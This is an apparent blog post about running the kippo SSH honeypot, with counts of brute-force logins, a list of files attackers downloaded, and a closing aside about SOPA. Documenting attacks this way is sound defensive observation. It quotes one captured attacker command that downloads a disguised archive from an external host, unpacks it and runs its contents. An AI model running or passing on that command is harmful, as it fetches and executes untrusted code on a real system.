After trying to build some nice graphs for the kippo-honeypot with PyCha I found
this little toolbox making things way better than I did:
kippo-graph Homepage (link fixed)
Here are the first results from my honeypot: (no live db-queries made, so Inputs
are not visible right now) Kippo-Stats
The kippo honeypot is now running for about a week..
Up to now I have seen
* more than 1.3 Million Connects
* more than 7.100 successful logins
* > 2.200 commands typed
* more than 2.100 different Source IP addresses
* 178 Files uploaded, most of them psyBNC bouncers
Whow.. I expected *some* brute-force atempts, but that much?
The sshd – honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some are downloading files and try to do “things”:
-rw——- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw——- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg
coming from commands like:
CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go
I will try to build some public stats later..
A twitter-message:
“Under SOPA, you could get 5 years for uploading a Michael Jackson
song, one year more than the doctor who killed him.”
For those who don’t know, what SOPA means:
http://en.wikipedia.org/wiki/Stop_Online_Piracy_Act